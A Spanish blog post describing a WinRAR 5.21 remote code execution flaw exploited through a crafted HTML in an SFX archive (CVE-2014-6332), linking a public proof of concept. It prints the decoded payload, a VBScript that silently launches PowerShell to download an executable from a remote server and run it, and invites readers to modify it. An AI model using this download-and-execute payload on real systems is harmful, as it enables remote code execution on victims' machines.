jueves, 1 de octubre de 2015

Como Explotar WinRAR 5.21 ¡Actualiza!

Ayer me llegó al correo una notificación de bugtraq donde la gente de RARLAB anunciaba que habían publicado una nueva vulnerabilidad en WinRAR. Si, la misma de la que os hablé en la entrada anterior. Bueno, la verdad es que me sorprendió ya que al ralo la vi publicada en [TheHackerNews] con el titulo de KILLER, empece a investigar un poco.
Ya hemos hablado un poco aquí [sobre Winrar y .zip] e incluso hemos explotado alguna vulnerabilidad en WinRAR 4.20 falsificando las extensiones.


Pero de la vulnerabilidad de la que os voy ha hablar hoy pasa mucho por un tema que me encanta que es el hecho de [bindear algo maligno para poder colarlo] en un auto-ejecutable SFX. 

Esta vulnerabilidad afecta a WinRAR 5.21 y permite la ejecución de código de forma remota a través de un HTML especialmente creado para tal fin y haciendo uso de la vulnerabilidad [CVE-2014-6332] / [MS15-064], la cual permite ejecución del código a través de Windows OLE. Mohammad Reza Espargham al encontrar la vulnerabilidad decidió gravarse el video y dejar una prueva de concepto (una PoC vamos) para todo aquel que quiera jugar un poco con la vulnerabilidad. 

Pero antes que dejaros el enlace a la PoC con las instrucciones para explotar la vulnerabilidad paso por paso. Os advierto que si descodificais el código ubicado en la variable my $poc= encontramos que automáticamente descarga un putty desde un servidor raro(no quiero ni saber si viene con bicho). 

Esto no es por que yo se muy listo sino por que en la PoC a bajo del todo lo pone:
  • $poc = decode_base64($poc);
Así que si lo "traducimos" encontramos lo siguiente: 
<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe','load.exe');$(New-Object -com Shell.Application).ShellExecute('load.exe');"
shell.ShellExecute "powershell.exe", "-Command " & command, "", "runas", 0
end function 
</scrit>
Bueno, encontramos un html completo que se habria de modificar en caso de querer ejecutar otros tipos de funciones. Así que dicho esto,  os dejo el enlace y el vídeo para que podáis ver paso por paso como explotar esta vulnerabilidad. 

Enlace a la PoC :
Vídeo:


Quería haber grabado el vídeo yo igual que hice con el otro, pero me ha sido imposible.

Fuente:


Sed Buenos con esto 0;) 

No hay comentarios:

Publicar un comentario